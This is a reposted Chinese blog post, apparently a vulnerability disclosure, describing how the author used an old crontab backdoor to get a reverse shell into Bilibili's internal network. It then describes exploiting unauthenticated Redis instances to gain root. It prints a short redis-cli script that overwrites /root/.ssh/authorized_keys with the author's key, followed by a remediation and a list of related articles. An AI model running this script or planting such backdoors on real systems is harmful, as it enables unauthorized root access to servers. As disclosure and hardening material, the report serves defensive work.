默认 redis 安装存在漏洞, 可以直接 获取 root 权限

转载 2016年01月28日 12:08:41

转载地址:http://www.2cto.com/Article/201512/454117.html


我假装闲来无事地在 VPS 上监听了某一个端口,然后突然反弹过来一个 shell。嗯,假装是不知道哪年哪月的一个 crontab 后门再次把我带入了 Bilibili 的内网。
内网存在许多 redis 未授权访问,为什么不问问神奇海螺呢?

详细说明:

我假装闲来无事地在 VPS 上监听了某一个端口,然后突然反弹过来一个 shell。

1.png

估计是之前留的 crontab 后门,不过这不重要。

前几天爆出了 redis 未授权访问然后写 authorized_keys 来强行拿权限,总之原理是如此如此,可以看
 http://www.2cto.com/Article/201512/454361.html 来了解具体利用。

在 B 站内网扫描了一下 6379 端口,然后写了一个 sh 脚本来自动化执行。
 

code 区域
?
1
2
3
4
5
<code>redis-cli  -h $1 flushall
    cat foo.txt | redis-cli -h $1 -x set 1
    redis-cli -h $1 config set dir /root/.ssh
    redis-cli -h $1 config set dbfilename authorized_keys
    redis-cli -h $1 save</code>

2.png

然后“姆Q”的一下子,成功了一个。

3.png

Bilibili (゜-゜)つロ 乾杯~

由于 redis 是用 root 权限启动的,所以直接能在 /root/.ssh/ 下面写文件。

5.png

4.png

漏洞证明:

3.png

5.png

4.png

如图所示

修复方案:

用 nobody 权限来启动 redis。,

另外测试的 172.16.0.208、172.16.0.203 的 authorized_keys 已恢复,crontab 后门已清理。


使用普通账户安装 Redis 服务

前面提到过黑客利用 Redis 漏洞实现无密码 root 登录。而 Redis 自身提供的安装方式和 Redis 服务必须使用 root 进行安装和启动,为这个漏洞提供了大大的便利。这里我整理了一个使...
  • AlexWoo0501
  • AlexWoo0501
  • 2016年01月06日 21:04
  • 3392

[Redis]Windows下Redis的安装、权限设置和在Python中使用

Redis入门
  • jy692405180
  • jy692405180
  • 2017年04月04日 18:32
  • 591

Redis三种启动方式

转自:http://www.tuicool.com/articles/aQbQ3u Part I. 直接启动 下载 官网下载 安装 tar zxvf redis-2....
  • abc86319253
  • abc86319253
  • 2016年01月06日 16:24
  • 2207

redis安装及简单使用

redis安装在官网下载redis安装包: http://redis.io/download 我下载的是 redis-3.0.6 版本 http://download.redis.io/rele...
  • u010414666
  • u010414666
  • 2016年01月07日 16:06
  • 1771

CentOS7 普通用户安装redis-3.2.9

CentOS7 普通用户安装redis-3.2.9
  • jamesChentt
  • jamesChentt
  • 2017年06月25日 10:59
  • 1043

使用普通账户安装 Redis 服务

前面提到过黑客利用 Redis 漏洞实现无密码 root 登录。而 Redis 自身提供的安装方式和 Redis 服务必须使用 root 进行安装和启动,为这个漏洞提供了大大的便利。这里我整理了一个使...
  • AlexWoo0501
  • AlexWoo0501
  • 2016年01月06日 21:04
  • 3392

linux服务器非root权限下搭建tensorflow框架

在linux上跑tensorflow程序的时候,往往需要各种python包,或者不同的版本的python,tensorflow,在没有root权限的情况下,只能去找管理员。这里分享一下我是如何在自己的...
  • m0_37915078
  • m0_37915078
  • 2017年12月12日 14:06
  • 136

非[无]root权限 服务器 下安装perl以及perl模块

转载自http://www.zilhua.com 在本博客中,所有的软件安装都在服务器上,且无root权限。理论上适合所有 Linux服务器非root权限下安装perl以及perl模块...
  • nayishunjian13
  • nayishunjian13
  • 2016年12月27日 09:39
  • 1457

非[无]root权限 服务器 下安装python以及python模块

转载自http://www.zilhua.com/413.html Linux非ROOT用户安装Python1.安装pythonPython
  • nayishunjian13
  • nayishunjian13
  • 2016年12月27日 09:46
  • 1375

python在非root权限下的安装

以前在使用Python的时候,都是使用root用户安装好的全局python,现在,因为root用户安装的Python版本太低,同时自己没有root权限去对全局Python升级,所以要在非root用户下...
  • salonhuang
  • salonhuang
  • 2017年04月11日 11:27
  • 1088
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:默认 redis 安装存在漏洞, 可以直接 获取 root 权限
举报原因:
原因补充:

(最多只允许输入30个字)